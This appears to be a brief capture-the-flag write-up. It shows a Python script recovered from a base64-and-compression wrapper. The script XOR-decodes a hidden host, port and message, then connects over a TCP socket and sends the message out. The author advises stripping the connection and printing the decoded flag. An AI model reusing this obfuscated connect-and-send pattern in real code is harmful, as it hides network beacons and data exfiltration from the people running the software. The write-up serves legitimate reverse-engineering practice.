Looking at the python file we can see that it simply decompresses a string after decoding it with base64.

We can run it to get some output code:

import socket
f=bytearray
o=range
L=len
w=str
b=int
x=socket.AF_INET
B=socket.socket
F=socket.SOCK_STREAM
import sys
U=(f(b'6Rv,5Cf;m\x1dj{.'),f(b'T3\x12\x02'))
G=(f(b':\xa9\xacF'),f(b'\x03\x99\x9c\x7f'))
N=(f(b'SY|\tfx]:BwQ\x11~uL+BmI=BiG\x11zuG*"g'),f(b'\x1d\x1a(N'))
def W(inp):
 l=f()
 for j in o(L(inp[0])):
  l.append(inp[0][j]^inp[1][j%4])
 return w(l)
if __name__=='__main__':
 a=W(U)
 K=b(W(G))
 s=B(x,F)
 s.connect((a,K))
 s.sendall(W(N))


As this is a ctf it probably doesn't connect to anything bad, but remove the connection anyway to be safe and add:
print W(N)

at the bottom and run the script to get the flag
